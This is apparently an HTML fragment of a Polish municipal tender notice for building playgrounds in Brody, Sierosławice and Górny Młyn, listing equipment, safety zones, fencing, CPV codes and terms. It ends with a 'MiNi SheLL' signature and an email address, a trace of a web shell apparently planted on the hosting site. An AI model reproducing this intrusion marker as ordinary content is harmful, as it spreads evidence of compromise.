<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Zadanie nr 1 budowa placu zabaw w miejscowości Brody zgodnie z projektem zagospodarowania terenu działki, zakres prac obejmuje:

-Dostawa i montaż na istniejącej nawierzchni trawiastej urządzeń zabawowych Croquet lub równoważnych:
Zestaw Ancymon 7 PRO - 1 szt. z drewna impregnowanego ciśnieniowo o wymiarach belki 
o średnicy 120 mm. 
Wymiary zestawu:  9,10 x 8,60 m w skład którego wchodzi: 
            - zjeżdżalnia 
- zjeżdżalnia mała
- 3 wieże główne
- drabinka do wieży 
- pomost niski
- pomost średni 
- pomost skośny krótki
- przeplotnia sznurowa 
- drabinka skośna
- pomost z belką
- pomost wiszący 
- belka z uchwytami 
- ścianka wspinaczkowa dwunarożnikowa niska
Wymiary strefy bezpieczeństwa: 11,10 x 10,40 m i wysokość zestawu 3,30 m. 

- 	1 szt. sprężynowiec Gepard o wymiarach do 1,20 x 0,65 m i strefie bezpieczeństwa 4,20 m, wysokość 0,50 m;
- 	4 szt. ławek drewnianych z oparciem, montowane na stałe o wymiarach całkowitych 1,70 x 0,60 m;
- 	1 szt. huśtawka wagowa grupa OT - Koniki o wymiarach 3,00 x 0,40 m, wymiary strefy bezpieczeństwa: 5,00 x 2,40 m, wysokość: 0,50 m.

-Montaż ogrodzenia o wysokości 1,0 m o rozstawie słupów stalowych 2,4 m wraz z bramą wjazdową o szerokości 3,0 m i furtką szerokości 1,0 m. Wymiary ogrodzenia szer. 14,0 
dl. 20,5 m;

-Humusowanie oraz obsianie całością trawą. 

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa


Wykonawca może wykorzystać równoważne elementy wyposażenia innych firm niż podane w dokumentacji. Za równoważne uważa się produkty posiadające następujące cechy:
będą tożsame pod względem materiałowym, rodzaju impregnacji i zabezpieczeń antykorozyjnych;
	będą tożsame pod względem formy i kolorystyki;
	będą tożsame pod względem parametrów wielkościowych, pół bezpieczeństwa 
i wysokości upadku;
	będą posiadały certyfikaty bezpieczeństwa;
	będą zgodne z dopuszczającymi do użytku normami. 

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa

Szczegóły określa również przedmiar robót który stanowi materiał pomocniczy
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej realizacji prac celem sprawdzenia warunków związanych z wykonaniem prac będący przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 37.53.52.00-9, 45.34.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa placu zabaw w miejscowości Sierosławice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zadanie nr 2 budowa placu zabaw w miejscowości Sierosławice zgodnie z projektem zagospodarowania terenu działki, zakres prac obejmuje:
-Dostawa i montaż na istniejącej nawierzchni trawiastej urządzeń zabawowych Croquet lub równoważnych:
Zestaw OGR 3 - 1 szt z drewna bezrdzeniowego o przekroju 95 x 95 mm i wymiarach 
9,50 x 5,70 m w skład którego wchodzi 
- zjeżdżalnia 
- pomost 
- wieża z dachem 
- wejście trójkątne
- wejście schody 
- pomost wiszący
- ścianka wspinaczkowa 
- ścianka wspinaczkowa narożna
- przejście rurowe
- przeplotnia
- drabinka pozioma i sznurowa

Wymiary strefy bezpieczeństwa: 12,50 x 7,70 m, wysokość zestawu 3,10 m.

	1 szt. sprężynowiec  Gepard o wymiarach do 1,20 x 0,65 m i strefie bezpieczeństwa 3,00 m, wysokość 0,50 m.;
	4 szt. ławek drewnianych z oparciem, montowane na stałe o wymiarach całkowitych 1,70 x 0,60 m;
	1 szt. huśtawka wagowa grupa OT - Koniki o wymiarach 3,00 x 0,40 m, wymiary strefy bezpieczeństwa: 5,00 x 2,40 m, wysokość: 0,50 m.

-Montaż ogrodzenia o wysokości 1,0 m o rozstawie słupów stalowych 2,4 m wraz z bramą wjazdową o szerokości 3,0 m i furtką szerokości 1,0 m. Wymiary ogrodzenia szer. 35,0 dł. 21 m.

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa

Wykonawca może wykorzystać równoważne elementy wyposażenia innych firm niż podane w dokumentacji. Za równoważne uważa się produkty posiadające następujące cechy:
	będą tożsame pod względem materiałowym, rodzaju impregnacji i zabezpieczeń antykorozyjnych;
	będą tożsame pod względem formy i kolorystyki;
	będą tożsame pod względem parametrów wielkościowych, pół bezpieczeństwa i wysokości upadku;
	będą posiadały certyfikaty bezpieczeństwa;
	będą zgodne z dopuszczającymi do użytku normami. 

Szczegóły określa również  przedmiar robót który stanowi materiał pomocniczy
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej realizacji prac celem sprawdzenia warunków związanych z wykonaniem prac będący przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.34.20.00-6, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa placu zabaw w miejscowości Górny Młyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zadanie nr 3 budowa placu zabaw w miejscowości Górny Młyn zgodnie z projektem zagospodarowania terenu działki, zakres prac obejmuje:

Dostawa i montaż na istniejącej nawierzchni trawiastej urządzeń zabawowych Croquet lub równoważnych:
Zestaw OGR 3 - 1 szt. z drewna bezrdzeniowego o przekroju 95 x 95 mm i wymiarach 9,50 x 5,70 m w skład którego wchodzi 
-zjeżdżalnia 
-pomost
-wieża z dachem
-wejście trójkątne
-wejście schody  
-pomost wiszący
-ścianka wspinaczkowa
-ścianka wspinaczkowa narożna 
-przejście rurowe 
-przeplotnia,
-drabinka pozioma i sznurowa
 
Wymiary strefy bezpieczeństwa: 12,50 x 7,70 m, wysokość zestawu 3,10 m.

	1 szt.- sprężynowiec Gepard o wymiarach do 1,20 x 0,65 m i strefie bezpieczeństwa 3,00 m, wysokość 0,50 m.;
	2 szt. ławek drewnianych z oparciem, montowane na stałe o wymiarach całkowitych 1,70 x 0,60 m;
	1 szt. huśtawka wagowa grupa OT - Koniki o wymiarach 3,00 x 0,40 m, wymiary strefy bezpieczeństwa: 5,00 x 2,40 m, wysokość: 0,50 m.

Montaż ogrodzenia o wysokości 1,0 m o rozstawie słupów stalowych 2,4 m wraz z bramą wjazdową  i furtką. 

Wykonanie chodnika z kostki brukowej o łącznej powierzchni 30 m2.

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa

Wykonawca może wykorzystać równoważne elementy wyposażenia innych firm niż podane w dokumentacji. Za równoważne uważa się produkty posiadające następujące cechy:
	będą tożsame pod względem materiałowym, rodzaju impregnacji i zabezpieczeń antykorozyjnych;
	będą tożsame pod względem formy i kolorystyki;
	będą tożsame pod względem parametrów wielkościowych, pół bezpieczeństwa 
i wysokości upadku;
	będą posiadały certyfikaty bezpieczeństwa;
	będą zgodne z dopuszczającymi do użytku normami. 

Szczegóły określa również przedmiar robót który stanowi materiał pomocniczy
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej realizacji prac celem sprawdzenia warunków związanych z wykonaniem prac będący przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.34.20.00-6, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com